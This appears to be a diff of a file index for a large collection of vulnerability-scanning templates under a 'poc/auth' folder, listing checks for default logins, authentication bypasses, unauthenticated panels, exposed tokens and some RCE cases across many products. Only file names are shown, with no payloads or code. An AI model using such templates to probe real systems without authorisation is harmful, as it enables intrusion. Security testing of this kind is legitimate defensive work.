./poc/auth/kentico-login-8447.yaml
./poc/auth/kentico-login.yaml
./poc/auth/key-cloak-admin-panel-2.yaml
@@ -2742,14 +2714,14 @@
./poc/auth/keybase-phish.yaml
./poc/auth/keycloak-admin-panel.yaml
./poc/auth/keycloak-json-8471.yaml
-./poc/auth/keycloak-json-8472.yaml
+./poc/auth/keycloak-json-8473.yaml
./poc/auth/keycloak-json-8474.yaml
./poc/auth/keycloak-open-redirect.yaml
./poc/auth/keycloak-openid-config-1.yaml
./poc/auth/keycloak-openid-config-2.yaml
-./poc/auth/keycloak-openid-config-8475.yaml
./poc/auth/keycloak-openid-config-8476.yaml
./poc/auth/keycloak-openid-config-8477.yaml
+./poc/auth/keycloak-openid-config.yaml
./poc/auth/keycloak-workflow.yaml
./poc/auth/keycloak-xss-8478.yaml
./poc/auth/keycloak-xss-8479.yaml
@@ -2794,7 +2766,7 @@
./poc/auth/kubeflow-dashboard-unauth-8517.yaml
./poc/auth/kubeflow-dashboard-unauth.yaml
./poc/auth/kubernetes-etcd-keys.yaml
-./poc/auth/kubernetes-unauth.yaml
+./poc/auth/kubernetes-unauth(1).yaml
./poc/auth/kubernetes-unauth.yml
./poc/auth/kyan-credential-exposure-8554.yaml
./poc/auth/kyan-credential-exposure.yaml
@@ -2993,14 +2965,13 @@
./poc/auth/lucee-login-8662.yaml
./poc/auth/lucee-login-8663.yaml
./poc/auth/lucee-login-8664.yaml
-./poc/auth/lucee-login-8665.yaml
./poc/auth/lucee-login.yaml
./poc/auth/luci-login-detection-8671.yaml
./poc/auth/luci-login-detection.yaml
./poc/auth/lutron-iot-default-login-8674.yaml
+./poc/auth/lutron-iot-default-login-8675.yaml
./poc/auth/lutron-iot-default-login-8676.yaml
./poc/auth/lutron-iot-default-login-8677.yaml
-./poc/auth/lutron-iot-default-login-8678.yaml
./poc/auth/lutron-iot-default-login.yaml
./poc/auth/lws-hide-login-4a0fdd3939bffa759435178b943a6005.yaml
./poc/auth/lws-hide-login-7028a7a909c306df4421bd71aeeefb14.yaml
@@ -3019,7 +2990,6 @@
./poc/auth/mailchimp-api-key-8722.yaml
./poc/auth/mailchimp-api-key-8723.yaml
./poc/auth/mailchimp-api-key-8724.yaml
-./poc/auth/mailchimp-api-key-8726.yaml
./poc/auth/mailchimp-api-key.yaml
./poc/auth/mailwatch-login.yaml
./poc/auth/maiteng-unauth.yaml
@@ -3034,8 +3004,8 @@
./poc/auth/matomo-login-portal.yaml
./poc/auth/meks-smart-author-widget-d7cf08d050d4d9c295d6307e65c1ae52.yaml
./poc/auth/meks-smart-author-widget.yaml
-./poc/auth/meshcentral-login-8801.yaml
./poc/auth/meshcentral-login-8802.yaml
+./poc/auth/meshcentral-login-8803.yaml
./poc/auth/meshcentral-login.yaml
./poc/auth/metersphere-login.yaml
./poc/auth/micro-focus-ucmdb-default-credentials-8843.yaml
@@ -3145,7 +3115,6 @@
./poc/auth/molongui-authorship-d4b210f46b637b290af516754eb158bf.yaml
./poc/auth/molongui-authorship-e8b0088ee9ffce961a1975e3644882d0.yaml
./poc/auth/molongui-authorship.yaml
-./poc/auth/mongodb-unauth-8925.yaml
./poc/auth/mongodb-unauth-8926.yaml
./poc/auth/mongodb-unauth-8927.yaml
./poc/auth/mongodb-unauth-8928.yaml
@@ -3191,10 +3160,10 @@
./poc/auth/nacos-user-list-unauthorized.yaml
./poc/auth/nagios-default-credential-8989.yaml
./poc/auth/nagios-default-credential.yaml
+./poc/auth/nagios-default-login-8990.yaml
./poc/auth/nagios-default-login-8991.yaml
./poc/auth/nagios-default-login-8992.yaml
./poc/auth/nagios-default-login-8993.yaml
-./poc/auth/nagios-default-login-8994.yaml
./poc/auth/naver-login-phish.yaml
./poc/auth/netauth.yaml
./poc/auth/netdata-unauth.yaml
@@ -3203,9 +3172,9 @@
./poc/auth/netgear-prosafe-login.yaml
./poc/auth/netgear-router-auth-bypass-1.yaml
./poc/auth/netgear-router-auth-bypass-2.yaml
-./poc/auth/netgear-router-auth-bypass-9025.yaml
./poc/auth/netgear-router-auth-bypass-9026.yaml
./poc/auth/netgear-router-auth-bypass-9027.yaml
+./poc/auth/netgear-router-auth-bypass.yaml
./poc/auth/netscalar-aaa-login-9047.yaml
./poc/auth/netscalar-aaa-login-9048.yaml
./poc/auth/netscalar-aaa-login.yaml
@@ -3213,8 +3182,8 @@
./poc/auth/netscaler-aaa-login.yaml
./poc/auth/netsus-default-login-9058.yaml
./poc/auth/netsus-default-login-9059.yaml
-./poc/auth/netsus-default-login-9060.yaml
-./poc/auth/netsus-server-login-9062.yaml
+./poc/auth/netsus-default-login.yaml
+./poc/auth/netsus-server-login-9061.yaml
./poc/auth/netsus-server-login.yaml
./poc/auth/netsweeper-preauth-rce-workflow.yaml
./poc/auth/newrelic-admin-api-key-9071.yaml
@@ -3239,7 +3208,6 @@
./poc/auth/nps-default-login-9142.yaml
./poc/auth/nps-default-login-9143.yaml
./poc/auth/nps-default-login-9144.yaml
-./poc/auth/nps-default-login-9145.yaml
./poc/auth/nps-default-password-9147.yaml
./poc/auth/nps-default-password.yaml
./poc/auth/nps-default-password.yml
@@ -3254,11 +3222,13 @@
./poc/auth/nutanix-web-console-login.yaml
./poc/auth/nuuno-network-login-9160.yaml
./poc/auth/nuuno-network-login-9161.yaml
-./poc/auth/nuuno-network-login-9162.yaml
./poc/auth/nuuno-network-login-9163.yaml
+./poc/auth/nuuno-network-login-9164.yaml
+./poc/auth/nuuno-network-login.yaml
./poc/auth/o2-default-password.yaml
./poc/auth/oauth-access-key-9184.yaml
./poc/auth/oauth-access-key-9185.yaml
+./poc/auth/oauth-access-key-9186.yaml
./poc/auth/oauth-client-cd3ce5265515419eaa2f80ce50d80c3b.yaml
./poc/auth/oauth-client-for-user-authentication-1e787d9eb928d177bffbf4da69766c02.yaml
./poc/auth/oauth-client-for-user-authentication-8b8330bacdc4e03bd13b4255b2f9c8e2.yaml
@@ -3273,7 +3243,6 @@
./poc/auth/oauth-twitter-feed-for-developers-2c4a03e880aaa9ac7d131e8aec6fd5ff.yaml
./poc/auth/oauth-twitter-feed-for-developers.yaml
./poc/auth/oauth2-detect-9180.yaml
-./poc/auth/oauth2-detect-9181.yaml
./poc/auth/oauth2-detect-9182.yaml
./poc/auth/oauth2-detect-9183.yaml
./poc/auth/oauth2-provider-2ae833691d89595113a94c5ad9ff28e0.yaml
@@ -3293,8 +3262,8 @@
./poc/auth/oauth2-server.yaml
./poc/auth/obf_token_smuggling.yml
./poc/auth/ocs-inventory-login.yaml
-./poc/auth/octobercms-default-login-9192.yaml
./poc/auth/octobercms-default-login-9193.yaml
+./poc/auth/octobercms-default-login.yaml
./poc/auth/octoprint-login-1.yaml
./poc/auth/octoprint-login-2.yaml
./poc/auth/octoprint-login-9197.yaml
@@ -3303,7 +3272,6 @@
./poc/auth/ofbiz-default-credentials.yaml
./poc/auth/ofbiz-default-login-9208.yaml
./poc/auth/ofbiz-default-login-9209.yaml
-./poc/auth/ofbiz-default-login-9210.yaml
./poc/auth/ofbiz-default-login-9211.yaml
./poc/auth/ofbiz-default-password.yaml
./poc/auth/officekeeper-admin-login.yaml
@@ -3348,14 +3316,13 @@
./poc/auth/onlyoffice-login-panel.yaml
./poc/auth/open-stack-dashboard-login-1.yaml
./poc/auth/open-stack-dashboard-login-2.yaml
-./poc/auth/open-stack-dashboard-login-9322.yaml
+./poc/auth/open-stack-dashboard-login-9321.yaml
./poc/auth/open-stack-dashboard-login-9323.yaml
./poc/auth/open-stack-dashboard-login-9324.yaml
./poc/auth/open-stack-dashboard-login.yaml
./poc/auth/openai-key.yaml
./poc/auth/openbmcs-secret-disclosure.yaml
./poc/auth/openemr-default-login-9270.yaml
-./poc/auth/openemr-default-login.yaml
./poc/auth/openerp-default-password.yaml
./poc/auth/openfire-credentials-exposure.yaml
./poc/auth/opengear-login.yaml
@@ -3372,6 +3339,7 @@
./poc/auth/oracle-ebs-credentials-disclosure-9363.yaml
./poc/auth/oracle-ebs-credentials-disclosure.yaml
./poc/auth/oracle-enterprise-manager-login.yaml
+./poc/auth/oracle-opera-login.yaml
./poc/auth/oracle-people-sign-in.yaml
./poc/auth/orbiteam-bscw-server-unauthenticated-lfi.yaml
./poc/auth/ov3-online-administration-unauthenticated-lfi.yaml
@@ -3386,12 +3354,15 @@
./poc/auth/panabit-gateway-default-password.yaml
./poc/auth/panabit-gateway-default-password.yml
./poc/auth/panabit-ixcache-default-login-9443.yaml
+./poc/auth/panabit-ixcache-default-login.yaml
./poc/auth/panabit-ixcache-default-password.yaml
./poc/auth/panabit-ixcache-default-password.yml
./poc/auth/panos-default-credentials.yaml
./poc/auth/panos-default-login-9454.yaml
+./poc/auth/panos-default-login-9455.yaml
./poc/auth/panos-default-login-9456.yaml
./poc/auth/panos-default-login-9457.yaml
+./poc/auth/panos-default-login.yaml
./poc/auth/papercut-missing-auth.yaml
./poc/auth/password-policy-not-set.yaml
./poc/auth/password-policy.yaml
@@ -3412,13 +3383,13 @@
./poc/auth/passwords-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/auth/passwords-manager-plugin.yaml
./poc/auth/passwords-manager.yaml
-./poc/auth/paypal-braintree-token-11856.yaml
+./poc/auth/paypal-braintree-token(1).yaml
./poc/auth/paypal-braintree-token.yaml
./poc/auth/pentaho-cve-2021-31602-authentication-bypass.yaml
./poc/auth/pentaho-cve-2021-31602-authentication-bypass.yml
./poc/auth/pentaho-default-login-9477.yaml
-./poc/auth/pentaho-default-login-9478.yaml
./poc/auth/pentaho-default-login-9479.yaml
+./poc/auth/pentaho-default-login-9480.yaml
./poc/auth/pentaho-default-login.yaml
./poc/auth/peoplenet-ikey.yaml
./poc/auth/peoplesoft-default-login.yaml
@@ -3474,7 +3445,6 @@
./poc/auth/pinpoint-unauth-1.yaml
./poc/auth/pinpoint-unauth-2.yaml
./poc/auth/pinpoint-unauth-9588.yaml
-./poc/auth/pinpoint-unauth-9590.yaml
./poc/auth/pinpoint-unauth.yaml
./poc/auth/plainview-protect-passwords-64631f7e755eb94d7c99500d0510ac42.yaml
./poc/auth/plainview-protect-passwords-79caa4f8ea1fa3260f686401ac5493b5.yaml
@@ -3489,10 +3459,9 @@
./poc/auth/pmpro-register-helper.yaml
./poc/auth/poc-yaml-F5-BIG-IP-login-bypass-CVE-2022-1388.yaml
./poc/auth/poc-yaml-otter-default-password.yaml
-./poc/auth/polycom-login-9625.yaml
./poc/auth/polycom-login-9626.yaml
+./poc/auth/polycom-login-9627.yaml
./poc/auth/polycom-login.yaml
-./poc/auth/possible-AEM-secrets.yaml
./poc/auth/postgres-default-logins.yaml
./poc/auth/postgresql-empty-password.yaml
./poc/auth/postgresql-weak-password.yaml
@@ -3521,8 +3490,8 @@
./poc/auth/pure-storage-login-9725.yaml
./poc/auth/pure-storage-login.yaml
./poc/auth/putty-private-key-disclosure-9729.yaml
+./poc/auth/putty-private-key-disclosure-9730.yaml
./poc/auth/putty-private-key-disclosure-9731.yaml
-./poc/auth/putty-private-key-disclosure-9732.yaml
./poc/auth/putty-private-key-disclosure.yaml
./poc/auth/putty-user-keyfile.yaml
./poc/auth/pypi-token.yaml
@@ -3550,16 +3519,18 @@
./poc/auth/rabbitmq-missing-auth.yaml
./poc/auth/racksnet-login.yaml
./poc/auth/rails-secret-token-disclosure-9808.yaml
-./poc/auth/rails-secret-token-disclosure-9809.yaml
+./poc/auth/rails-secret-token-disclosure-9810.yaml
./poc/auth/rails-secret-token-disclosure.yaml
./poc/auth/rails-secret-token.yaml
./poc/auth/rainloop-default-login-9811.yaml
./poc/auth/rainloop-default-login-9812.yaml
./poc/auth/rainloop-default-login-9813.yaml
+./poc/auth/rainloop-default-login.yaml
./poc/auth/rancher-default-login-9814.yaml
./poc/auth/rancher-default-login-9815.yaml
./poc/auth/rancher-default-login-9816.yaml
./poc/auth/rancher-default-password.yaml
+./poc/auth/ranger-default-login-9827.yaml
./poc/auth/ranger-default-login-9828.yaml
./poc/auth/raw-cookie-reuse.yaml
./poc/auth/real-cookie-banner-1dba91bdd70cfd02be29db46dcf540b8.yaml
@@ -3629,13 +3600,13 @@
./poc/auth/robomongo-credential.yaml
./poc/auth/rockmongo-default-credentials-9896.yaml
./poc/auth/rockmongo-default-credentials.yaml
+./poc/auth/rockmongo-default-login-9897.yaml
./poc/auth/rockmongo-default-login-9898.yaml
./poc/auth/rockmongo-default-login-9899.yaml
./poc/auth/rockmongo-default-login-9900.yaml
./poc/auth/rockmongo-default-password.yaml
./poc/auth/rockmongo-default-password.yml
-./poc/auth/routeros-login-9908.yaml
-./poc/auth/routeros-login.yaml
+./poc/auth/routeros-login-9909.yaml
./poc/auth/rseenet-default-login-9913.yaml
./poc/auth/rseenet-default-login-9914.yaml
./poc/auth/rseenet-default-login-9915.yaml
@@ -3647,7 +3618,6 @@
./poc/auth/ruijie-eg-and-nbr-guest-auth-guestisup-rce.yaml
./poc/auth/ruijie-eg-and-nbr-local-auth-php-fileread.yaml
./poc/auth/ruijie-eg-and-nbr-login-php-infoleak-to-rce.yaml
-./poc/auth/ruijie-eg-password-leak-9922.yaml
./poc/auth/ruijie-eg-password-leak-9923.yaml
./poc/auth/ruijie-eg-password-leak-9924.yaml
./poc/auth/ruijie-eg-password-leak.yaml
@@ -3665,8 +3635,8 @@
./poc/auth/s3-bucket-key.yaml
./poc/auth/safenet-authentication-panel.yaml
./poc/auth/saferoads-vms-login-9970.yaml
-./poc/auth/saferoads-vms-login-9971.yaml
./poc/auth/saferoads-vms-login-9972.yaml
+./poc/auth/saferoads-vms-login-9973.yaml
./poc/auth/saferoads-vms-login-9974.yaml
./poc/auth/saferoads-vms-login.yaml
./poc/auth/sagem-2604-password-disclosure.yaml
@@ -3680,6 +3650,7 @@
./poc/auth/samsung-wlan-default-login-10015.yaml
./poc/auth/samsung-wlan-default-login-10016.yaml
./poc/auth/samsung-wlan-default-login-10017.yaml
+./poc/auth/samsung-wlan-default-login-10018.yaml
./poc/auth/sangfor-ad-login-rce.yaml
./poc/auth/sangfor-behavior-management-or-identity-authentication-system.yaml
./poc/auth/sangfor-edr-arbitrary-admin-login.yaml
@@ -3687,19 +3658,17 @@
./poc/auth/sangfor-edr-auth-bypass-10022.yaml
./poc/auth/sangfor-edr-auth-bypass-10023.yaml
./poc/auth/sangfor-edr-auth-bypass-10024.yaml
-./poc/auth/sangfor-edr-auth-bypass.yaml
./poc/auth/sangfor-report-rep-login-rce.yaml
./poc/auth/sangfor-vpn-supersession-rce.yaml
./poc/auth/sas-login-panel.yaml
./poc/auth/sauce-access-token.yaml
./poc/auth/sauter-login-10088.yaml
-./poc/auth/sauter-login-10089.yaml
./poc/auth/sauter-login-10090.yaml
+./poc/auth/sauter-login-10091.yaml
./poc/auth/sauter-login.yaml
./poc/auth/schneider-link150-login.yaml
./poc/auth/scriptcase-prod-login.yaml
./poc/auth/seagate-nas-login.yaml
-./poc/auth/seats-login-10104.yaml
./poc/auth/seats-login-10105.yaml
./poc/auth/seats-login-10106.yaml
./poc/auth/seats-login-10107.yaml
@@ -3748,9 +3717,9 @@
./poc/auth/sequoiadb-default-login-10150.yaml
./poc/auth/sequoiadb-default-login-10152.yaml
./poc/auth/sequoiadb-login.yaml
+./poc/auth/server-backup-login-10153.yaml
./poc/auth/server-backup-login-10154.yaml
./poc/auth/server-backup-login-10155.yaml
-./poc/auth/server-backup-login-10156.yaml
./poc/auth/server-backup-login.yaml
./poc/auth/server-backup-manager-se-login-detect.yaml
./poc/auth/server-private-keys-1.yaml
@@ -3776,13 +3745,12 @@
./poc/auth/server-private-keys-9.yaml
./poc/auth/server-private-keys.yaml
./poc/auth/service-account-credentials.yaml
+./poc/auth/service-pwd-10176.yaml
./poc/auth/service-pwd-10177.yaml
./poc/auth/service-pwd-10178.yaml
./poc/auth/service-pwd-10179.yaml
-./poc/auth/service-pwd.yaml
./poc/auth/servicedesk-login-panel-1.yaml
./poc/auth/servicedesk-login-panel-10171.yaml
-./poc/auth/servicedesk-login-panel-10172.yaml
./poc/auth/servicedesk-login-panel-10173.yaml
./poc/auth/servicedesk-login-panel-2.yaml
./poc/auth/servicedesk-login-panel.yaml
@@ -3810,12 +3778,11 @@
./poc/auth/shikongzhiyou-erp-login-fileread.yaml
./poc/auth/shikongzhiyou-login_fileread.yaml
./poc/auth/shiro-124-rememberme.yaml
-./poc/auth/shopify-custom-token-10198.yaml
+./poc/auth/shopify-custom-token(1).yaml
./poc/auth/shopify-custom-token-11860.yaml
./poc/auth/shopify-custom-token.yaml
./poc/auth/shopify-legacy-private-app-token.yaml
./poc/auth/shopify-private-token-10199.yaml
-./poc/auth/shopify-private-token-11861.yaml
./poc/auth/shopify-private-token.yaml
./poc/auth/shopify-shared-secret-11862.yaml
./poc/auth/shopify-shared-secret.yaml
@@ -3824,6 +3791,8 @@
./poc/auth/shoppable-token-10206.yaml
./poc/auth/shoppable-token-10207.yaml
./poc/auth/shoppable-token-10208.yaml
+./poc/auth/shoppable-token-10209.yaml
+./poc/auth/shoppable-token.yaml
./poc/auth/showdoc-default-login-10219.yaml
./poc/auth/showdoc-default-login-10220.yaml
./poc/auth/showdoc-default-login-10221.yaml
@@ -3863,10 +3832,10 @@
./poc/auth/sitecore-login.yaml
./poc/auth/sitefinity-login-10295.yaml
./poc/auth/sitefinity-login-10296.yaml
-./poc/auth/sitefinity-login-10298.yaml
+./poc/auth/sitefinity-login-10297.yaml
./poc/auth/sitefinity-login-10299.yaml
./poc/auth/sitefinity-login.yaml
-./poc/auth/siteomat-login-10300.yaml
+./poc/auth/siteomat-login-10301.yaml
./poc/auth/siteomat-login-10302.yaml
./poc/auth/siteomat-login-10303.yaml
./poc/auth/siteomat-login.yaml
@@ -3877,6 +3846,7 @@
./poc/auth/slack-api-token.yaml
./poc/auth/slack-bot-token-10310.yaml
./poc/auth/slack-bot-token-10311.yaml
+./poc/auth/slack-bot-token-10312.yaml
./poc/auth/slack-user-token-10314.yaml
./poc/auth/slack-webhook-token-10315.yaml
./poc/auth/slocum-login-10317.yaml
@@ -3903,22 +3873,20 @@
./poc/auth/social-login-lite-for-woocommerce.yaml
./poc/auth/social-login-wp-e99eebfad9065c45993831ff9d87e487.yaml
./poc/auth/social-login-wp.yaml
-./poc/auth/solar-log-authbypass-10352.yaml
./poc/auth/solar-log-authbypass-10353.yaml
+./poc/auth/solar-log-authbypass.yaml
./poc/auth/solarwinds-default-login-1.yaml
./poc/auth/solarwinds-default-login-10354.yaml
-./poc/auth/solarwinds-default-login-10355.yaml
./poc/auth/solarwinds-default-login-10356.yaml
./poc/auth/solarwinds-default-login-2.yaml
+./poc/auth/somfy-login-10371.yaml
./poc/auth/somfy-login-10372.yaml
-./poc/auth/somfy-login-10373.yaml
./poc/auth/somfy-login.yaml
./poc/auth/sonarqube-cred.yaml
./poc/auth/sonarqube-cve-2020-27986-unauth.yml
./poc/auth/sonarqube-login-10374.yaml
./poc/auth/sonarqube-login-10375.yaml
./poc/auth/sonarqube-login.yaml
-./poc/auth/sonarqube-token-10380.yaml
./poc/auth/sonarqube-token-10381.yaml
./poc/auth/sonarqube-token-10382.yaml
./poc/auth/sonic-wall-login.yaml
@@ -3930,6 +3898,7 @@
./poc/auth/spark-api-unauth.yml
./poc/auth/spark-unauth.yaml
./poc/auth/spark-webui-unauth-10400.yaml
+./poc/auth/spark-webui-unauth-10401.yaml
./poc/auth/spark-webui-unauth-10402.yaml
./poc/auth/spark-webui-unauth.yaml
./poc/auth/spark-webui-unauth.yml
@@ -3939,14 +3908,14 @@
./poc/auth/spectracom-default-login-10406.yaml
./poc/auth/spectracom-default-password.yaml
./poc/auth/sphider-login-1.yaml
-./poc/auth/sphider-login-10407.yaml
./poc/auth/sphider-login-10408.yaml
+./poc/auth/sphider-login-10409.yaml
./poc/auth/sphider-login-10410.yaml
./poc/auth/sphider-login-2.yaml
./poc/auth/sphider-login-3.yaml
./poc/auth/sphider-login.yaml
./poc/auth/splunk-enterprise-login-panel.yaml
-./poc/auth/splunk-enterprise-login-panel.yml
+./poc/auth/splunk-login-10416.yaml
./poc/auth/splunk-login-10417.yaml
./poc/auth/splunk-login-10418.yaml
./poc/auth/splunk-login-10419.yaml
@@ -3956,7 +3925,7 @@
./poc/auth/springboot-actuator-unauth.yaml
./poc/auth/springboot-env-unauth.yaml
./poc/auth/springboot-env-unauth.yml
-./poc/auth/square-access-token(1).yaml
+./poc/auth/square-access-token-11867.yaml
./poc/auth/square-access-token.yaml
./poc/auth/square-oauth-secret-11868.yaml
./poc/auth/square-oauth-secret.yaml
@@ -3984,35 +3953,35 @@
./poc/auth/stackstorm-default-login.yaml
./poc/auth/stem-audio-table-private-keys-10533.yaml
./poc/auth/stem-audio-table-private-keys-10534.yaml
-./poc/auth/stem-audio-table-private-keys-10536.yaml
+./poc/auth/stem-audio-table-private-keys-10535.yaml
./poc/auth/stem-audio-table-private-keys.yaml
./poc/auth/steve-login-panel.yaml
./poc/auth/storm-unauthorized-access.yaml
-./poc/auth/stripe-api-key-11869.yaml
+./poc/auth/stripe-api-key(1).yaml
./poc/auth/stripe-api-key.yaml
./poc/auth/stripe-restricted-key-10553.yaml
./poc/auth/stripe-restricted-key-10554.yaml
+./poc/auth/stripe-restricted-key.yaml
./poc/auth/stripe-secret-key-10556.yaml
./poc/auth/stripe-secret-key-10557.yaml
./poc/auth/stripe-secret-key-10558.yaml
./poc/auth/structurizr-default-login.yaml
./poc/auth/submitty-login-10567.yaml
-./poc/auth/submitty-login-10568.yaml
./poc/auth/submitty-login.yaml
./poc/auth/subrion-login.yaml
./poc/auth/sunlogin.yaml
./poc/auth/sunlogin_RCE_CNVD-2022-10270.yaml
./poc/auth/supermicro-default-login-10572.yaml
+./poc/auth/supermicro-default-login.yaml
./poc/auth/superset-default-login-10573.yaml
./poc/auth/superset-default-login-10574.yaml
./poc/auth/superset-default-login.yaml
./poc/auth/superset-login.yaml
-./poc/auth/symantec-dlp-login-10596.yaml
./poc/auth/symantec-dlp-login-10597.yaml
./poc/auth/symantec-dlp-login-10598.yaml
./poc/auth/symantec-dlp-login.yaml
+./poc/auth/symantec-epm-login-10599.yaml
./poc/auth/symantec-epm-login-10600.yaml
-./poc/auth/symantec-epm-login-10601.yaml
./poc/auth/symantec-epm-login-10602.yaml
./poc/auth/symantec-epm-login.yaml
./poc/auth/symantec-ewep-login-10604.yaml
@@ -4022,7 +3991,7 @@
./poc/auth/szhe-default-login-10635.yaml
./poc/auth/szhe-default-login-10636.yaml
./poc/auth/szhe-default-login-10637.yaml
-./poc/auth/szhe-default-login.yaml
+./poc/auth/szhe-default-login-10638.yaml
./poc/auth/szhe-default-password-10639.yaml
./poc/auth/szhe-default-password-10640.yaml
./poc/auth/szhe-default-password.yaml
@@ -4030,6 +3999,7 @@
./poc/auth/teamcity-login-panel.yaml
./poc/auth/teamtalk-login.yaml
./poc/auth/telecom-gateway-default-login-10686.yaml
+./poc/auth/telecom-gateway-default-login.yaml
./poc/auth/telecom-gateway-default-password.yaml
./poc/auth/telecom-gateway-default-password.yml
./poc/auth/telegram-token.yaml
@@ -4053,8 +4023,8 @@
./poc/auth/threatq-login.yaml
./poc/auth/thruk-login.yaml
./poc/auth/tidb-native-password.yaml
+./poc/auth/tidb-unauth-10770.yaml
./poc/auth/tidb-unauth-10771.yaml
-./poc/auth/tidb-unauth-10772.yaml
./poc/auth/tidb-unauth.yaml
./poc/auth/timekeeper-default-login.yaml
./poc/auth/tingsboard-default-login.yaml
@@ -4066,6 +4036,7 @@
./poc/auth/tomcat-default-login-10789.yaml
./poc/auth/tomcat-default-login-10790.yaml
./poc/auth/tomcat-default-login-10791.yaml
+./poc/auth/tomcat-default-login.yaml
./poc/auth/tomcat-examples-login.yaml
./poc/auth/tomcat-manager-default-creds.yaml
./poc/auth/tongda-meeting-unauthorized-access.yml
@@ -4113,8 +4084,9 @@
./poc/auth/tyan-rmm-bmc-default-login.yaml
./poc/auth/typo3-login.yaml
./poc/auth/ucmdb-default-login-10868.yaml
-./poc/auth/ucmdb-default-login-10869.yaml
./poc/auth/ucmdb-default-login-10870.yaml
+./poc/auth/ucmdb-default-login-10871.yaml
+./poc/auth/ucmdb-default-login.yaml
./poc/auth/uk-cookie-consent-0bbba77520762097a09ab36a8d9ac90f.yaml
./poc/auth/uk-cookie-consent.yaml
./poc/auth/uk-cookie-d24507ac932285b70361a7e9dd308165.yaml
@@ -4125,11 +4097,10 @@
./poc/auth/unauth-ftp-10939.yaml
./poc/auth/unauth-ftp-10940.yaml
./poc/auth/unauth-ftp-10941.yaml
-./poc/auth/unauth-ftp-10942.yaml
./poc/auth/unauth-ftp.yaml
./poc/auth/unauth-hoteldruid-panel-1.yaml
-./poc/auth/unauth-hoteldruid-panel-10943.yaml
./poc/auth/unauth-hoteldruid-panel-2.yaml
+./poc/auth/unauth-hoteldruid-panel.yaml
./poc/auth/unauth-kubecost.yaml
./poc/auth/unauth-ldap-account-manager.yaml
./poc/auth/unauth-mautic-upgrade.yaml
@@ -4149,33 +4120,33 @@
./poc/auth/unauth-spark-api-10963.yaml
./poc/auth/unauth-spark-api-10964.yaml
./poc/auth/unauth-spark-api-10965.yaml
-./poc/auth/unauth-spark-api.yaml
./poc/auth/unauth-temporal-web-ui.yaml
./poc/auth/unauth-wavink-panel-10966.yaml
-./poc/auth/unauth-xproxy-dashboard-10968.yaml
+./poc/auth/unauth-wavink-panel-10967.yaml
+./poc/auth/unauth-xproxy-dashboard-10969.yaml
./poc/auth/unauth-xproxy-dashboard.yaml
./poc/auth/unauth-zwave-mqtt.yaml
./poc/auth/unauthen-elastic.yaml
./poc/auth/unauthen-kibana.yaml
+./poc/auth/unauthenticated-airflow-10884.yaml
./poc/auth/unauthenticated-airflow-10885.yaml
-./poc/auth/unauthenticated-airflow-10886.yaml
./poc/auth/unauthenticated-airflow-10887.yaml
./poc/auth/unauthenticated-airflow.yaml
./poc/auth/unauthenticated-alert-manager-10888.yaml
./poc/auth/unauthenticated-alert-manager-10889.yaml
./poc/auth/unauthenticated-alert-manager-10890.yaml
./poc/auth/unauthenticated-alert-manager-10891.yaml
-./poc/auth/unauthenticated-alert-manager-10892.yaml
./poc/auth/unauthenticated-frp-10893.yaml
./poc/auth/unauthenticated-frp-10894.yaml
+./poc/auth/unauthenticated-frp-10895.yaml
./poc/auth/unauthenticated-frp-10896.yaml
-./poc/auth/unauthenticated-frp-10897.yaml
./poc/auth/unauthenticated-frp.yaml
./poc/auth/unauthenticated-glances-10898.yaml
./poc/auth/unauthenticated-glances-10899.yaml
./poc/auth/unauthenticated-glowroot-10900.yaml
./poc/auth/unauthenticated-glowroot-10901.yaml
./poc/auth/unauthenticated-glowroot-10902.yaml
+./poc/auth/unauthenticated-influxdb-10903.yaml
./poc/auth/unauthenticated-influxdb.yaml
./poc/auth/unauthenticated-jenkin-dashboard.yaml
./poc/auth/unauthenticated-jenkins.yaml
@@ -4188,10 +4159,11 @@
./poc/auth/unauthenticated-mongo-express-10910.yaml
./poc/auth/unauthenticated-mongo-express-10911.yaml
./poc/auth/unauthenticated-mongo-express-2.yaml
+./poc/auth/unauthenticated-mongo-express.yaml
./poc/auth/unauthenticated-nacos-access-1.yaml
+./poc/auth/unauthenticated-nacos-access-10912.yaml
./poc/auth/unauthenticated-nacos-access-10913.yaml
./poc/auth/unauthenticated-nacos-access-10914.yaml
-./poc/auth/unauthenticated-nacos-access-10915.yaml
./poc/auth/unauthenticated-nacos-access-2.yaml
./poc/auth/unauthenticated-nacos-access.yaml
./poc/auth/unauthenticated-netdata-10916.yaml
@@ -4200,11 +4172,12 @@
./poc/auth/unauthenticated-nginx-dashboard.yaml
./poc/auth/unauthenticated-popup-upload-10919.yaml
./poc/auth/unauthenticated-popup-upload-10920.yaml
-./poc/auth/unauthenticated-popup-upload-10922.yaml
+./poc/auth/unauthenticated-popup-upload-10921.yaml
./poc/auth/unauthenticated-popup-upload-10923.yaml
-./poc/auth/unauthenticated-prtg-10924.yaml
+./poc/auth/unauthenticated-popup-upload.yaml
./poc/auth/unauthenticated-prtg-10925.yaml
./poc/auth/unauthenticated-prtg-10926.yaml
+./poc/auth/unauthenticated-prtg-10927.yaml
./poc/auth/unauthenticated-prtg-10928.yaml
./poc/auth/unauthenticated-qax-vpn-access.yaml
./poc/auth/unauthenticated-tensorboard-10929.yaml
@@ -4214,24 +4187,23 @@
./poc/auth/unauthenticated-varnish-cache-purge-10934.yaml
./poc/auth/unauthenticated-varnish-cache-purge.yaml
./poc/auth/unauthenticated-zipkin-10936.yaml
-./poc/auth/unauthenticated-zipkin.yaml
./poc/auth/unauthenticated-zippkin-10938.yaml
./poc/auth/unauthenticated-zippkin.yaml
./poc/auth/unauthorized-access-to-secret.yaml
./poc/auth/unauthorized-access.yaml
./poc/auth/unauthorized-brother-access-detect.yaml
-./poc/auth/unauthorized-h3csecparh-login-10948.yaml
./poc/auth/unauthorized-h3csecparh-login-10949.yaml
+./poc/auth/unauthorized-h3csecparh-login.yaml
./poc/auth/unauthorized-hp-officepro-printer-10950.yaml
./poc/auth/unauthorized-hp-officepro-printer.yaml
+./poc/auth/unauthorized-hp-printer-10951.yaml
./poc/auth/unauthorized-hp-printer-10952.yaml
./poc/auth/unauthorized-hp-printer-10954.yaml
./poc/auth/unauthorized-hp-printer.yaml
./poc/auth/unauthorized-plastic-scm-10955.yaml
./poc/auth/unauthorized-plastic-scm-10956.yaml
-./poc/auth/unauthorized-plastic-scm-10957.yaml
./poc/auth/unauthorized-printer-hp.yaml
-./poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml
+./poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml
./poc/auth/unauthorized-puppet-node-manager-detect.yaml
